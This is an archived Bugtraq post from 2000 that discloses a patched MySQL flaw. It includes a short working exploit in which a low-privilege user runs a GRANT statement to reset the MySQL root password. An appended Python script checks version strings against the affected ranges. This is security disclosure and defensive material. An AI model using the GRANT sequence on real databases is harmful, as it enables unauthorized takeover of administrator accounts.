Bugtraq mailing list archives

Re: Serious bug in MySQL password handling.


From: viktor () DTEK CHALMERS SE (Viktor Fougstedt)
Date: Mon, 14 Feb 2000 21:19:17 +0100


Hi.

As I posted to bugtraq a few weeks ago, I discovered a serious bug in
MySQL's password handling, affecting versions 3.22.29 and earlier, and
3.23.8 and earlier.

As promised in that post, I now post an exploit, since all serious
admins should have upgraded by now, especially with the
password-checking bug found recently by Robert van der Meulen.

Note that the bug which the code in this post exploits is fixed in
3.22.30 and later, as well as 3.23.10 and later. No current MySQL
is vulnerable to this exploit.

The old problem was simply that any user could alter any password in
the system using the GRANT statement.

Exploit: Connect to mysql as any user with grant privileges for any
table. The default test users will do nicely. If no databases have been
created for the test user, do so. Then alter root's (MySQL's root, not
the real root!) password with a GRANT. After the code below has been
executed, the password of the MySQL superuser 'root' will be
'newpassword'.

mysql -utest -p
Password:

mysql> CREATE DATABASE test_expl;
Query OK, 1 row affected (0.04 sec)

mysql> GRANT select ON test_expl.* TO root@localhost IDENTIFIED BY 'newpassword';
Query OK, 0 rows affected (0.01 sec)

mysql> exit
Bye

The problem was quickly fixed, and I got a good response from the people
at TCX Datakonsult AB (thanks Monty!). I warmly recommend MySQL to
anyone.

This message is not CC:ed to the mysql-list, as an exploit has already
been posted there.

/Viktor...

--|     Viktor Fougstedt, system administrator at dtek.chalmers.se     |--
--|                http://www.dtek.chalmers.se/~viktor/                |--
--| ...soon we'll be sliding down the razor blade of life. /Tom Lehrer |--
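For checking an installation against the version ranges the post gives, here is an added example (not part of the original post, and not MySQL's own code) that classifies a MySQL version string as affected or fixed. It treats 3.23.9, which the post names neither as affected nor as fixed, as "unknown" and flags it for upgrade; that conservative handling is my assumption, not something the post states.

```python
"""Classify a MySQL server version against the ranges named in the post:
affected 3.22.29 and earlier, 3.23.8 and earlier; fixed 3.22.30 and later,
3.23.10 and later."""
import re

VULNERABLE, FIXED, UNKNOWN = "vulnerable", "fixed", "unknown"


def parse_version(version):
    """Return (major, minor, patch) from strings such as '3.23.10-alpha'
    or '3.22.32-log'; anything after the third number is ignored."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unrecognised MySQL version string: %r" % version)
    return tuple(int(x) for x in m.groups())


def grant_password_bug_status(version):
    """Map a version string onto the post's affected/fixed ranges."""
    v = parse_version(version)
    if v >= (3, 23, 10):          # 3.23.10 and later (and any newer line)
        return FIXED
    if v >= (3, 23, 0):           # inside the 3.23 development line
        if v <= (3, 23, 8):
            return VULNERABLE
        return UNKNOWN            # 3.23.9: not listed either way (assumption)
    if v >= (3, 22, 30):          # 3.22.30 up to, but not including, 3.23.0
        return FIXED
    return VULNERABLE             # 3.22.29 and everything earlier


def needs_upgrade(version):
    """Defender's rule: anything not positively fixed should be upgraded."""
    return grant_password_bug_status(version) != FIXED


if __name__ == "__main__":
    # Constructed sample strings, as 'mysqld --version' style output might show.
    for sample in ("3.21.33", "3.22.29", "3.22.32-log", "3.23.8-alpha",
                   "3.23.9", "3.23.10", "4.0.1"):
        status = grant_password_bug_status(sample)
        action = "upgrade" if needs_upgrade(sample) else "ok"
        print("%-14s %-10s %s" % (sample, status, action))
```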
